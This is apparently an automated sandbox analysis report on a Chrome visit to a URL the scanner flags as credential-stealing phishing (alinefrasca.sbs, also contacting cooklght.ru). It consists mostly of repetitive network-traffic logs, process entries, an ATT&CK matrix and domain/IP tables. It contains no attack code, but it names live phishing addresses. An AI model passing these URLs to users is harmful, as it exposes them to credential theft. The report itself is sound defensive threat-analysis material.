    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
    Source: classification engineClassification label: mal60.phis.win@19/63@30/12
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2296,i,4055844674821034473,7721358641859555857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alinefrasca.sbs/pktcr/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2296,i,4055844674821034473,7721358641859555857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://alinefrasca.sbs/pktcr/100%SlashNextCredential Stealing type: Phishing & Social Engineering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://getbootstrap.com/)0%URL Reputationsafe
    https://fontawesome.com/license/free0%URL Reputationsafe
    https://fontawesome.com0%URL Reputationsafe
    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css0%URL Reputationsafe
    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.193.229
    truefalse
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        cooklght.ru
        104.21.91.145
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            unknown
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              unknown
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                unknown
                www.google.com
                142.250.186.164
                truefalse
                  unknown
                  alinefrasca.sbs
                  188.114.97.3
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      cdn.jsdelivr.net
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.jsfalse
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6false
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/false
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rEfalse
                                unknown
                                https://cooklght.ru/favicon.icofalse
                                  unknown
                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9998e48bc0e98b&lang=autofalse
                                      unknown
                                      https://cooklght.ru//#inventoryfalse
                                        unknown
                                        https://alinefrasca.sbs/pktcr/true
                                          unknown
                                          https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.cssfalse
                                            unknown
                                            https://a.nel.cloudflare.com/report/v4?s=wU86ZkLChHGwsGXE7iVMwUH4zwTrzKODgoeTBUCkRFC%2FN77LdGcTyfToJ3FFEFE08SIJJZd%2FULcl%2BAFOXmP3cxNffWx5xEW2eVvOkQofnLEj8cyoSShA5Bm799Ml%2BA%3D%3Dfalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                unknown
                                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2false
                                                  unknown
                                                  https://alinefrasca.sbs/favicon.icofalse
                                                    unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2false
                                                      unknown
                                                      https://a.nel.cloudflare.com/report/v4?s=tWDJGVbsRup9wEhI8G2C6JBLwORuljVlhy5aGB2I7LpDzpfC8LmIaVaoPSXEVkF9yuPp%2BpSMcGHQE3kqmLYXvbmfzz3oPnw13mj8%2BDJpZaq4QwWYQ7VahPAAB5lKL8bmzBU%3Dfalse
                                                        unknown
                                                        https://cooklght.ru//false
                                                          unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8d9998e48bc0e98b/1730104580522/2e00cf1394d42c89cdf811406f5e4269e35051a7617a342d077837e4d476bf20/0obqbK39GmXmtGTfalse
                                                            unknown
                                                            https://cooklght.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                                              unknown
                                                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://cooklght.ru//#contactchromecache_90.2.dr, chromecache_69.2.drfalse
                                                                unknown
                                                                https://cdn.jsdelivr.net/npm/bootstrapchromecache_90.2.dr, chromecache_69.2.drfalse
                                                                  unknown
                                                                  https://cooklght.ru//#serviceschromecache_90.2.dr, chromecache_69.2.drfalse
                                                                    unknown
                                                                    https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_93.2.dr, chromecache_91.2.drfalse
                                                                      unknown
                                                                      https://getbootstrap.com/)chromecache_93.2.dr, chromecache_91.2.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://linkedin.com/in/cooklght.ruchromecache_90.2.dr, chromecache_69.2.drfalse
                                                                        unknown
                                                                        https://fontawesome.com/license/freechromecache_80.2.dr, chromecache_77.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://fontawesome.comchromecache_80.2.dr, chromecache_77.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://x.com/cooklght.ruchromecache_90.2.dr, chromecache_69.2.drfalse
                                                                          unknown
                                                                          https://instagram.com/cooklght.ruchromecache_90.2.dr, chromecache_69.2.drfalse
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.17.24.14
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            151.101.193.229
                                                                            jsdelivr.map.fastly.netUnited States
                                                                            54113FASTLYUSfalse
                                                                            104.18.94.41
                                                                            challenges.cloudflare.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.18.95.41
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            239.255.255.250
                                                                            unknownReserved
                                                                            unknownunknownfalse
                                                                            188.114.97.3
                                                                            alinefrasca.sbsEuropean Union
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.186.164
                                                                            www.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            35.190.80.1
                                                                            a.nel.cloudflare.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.17.25.14
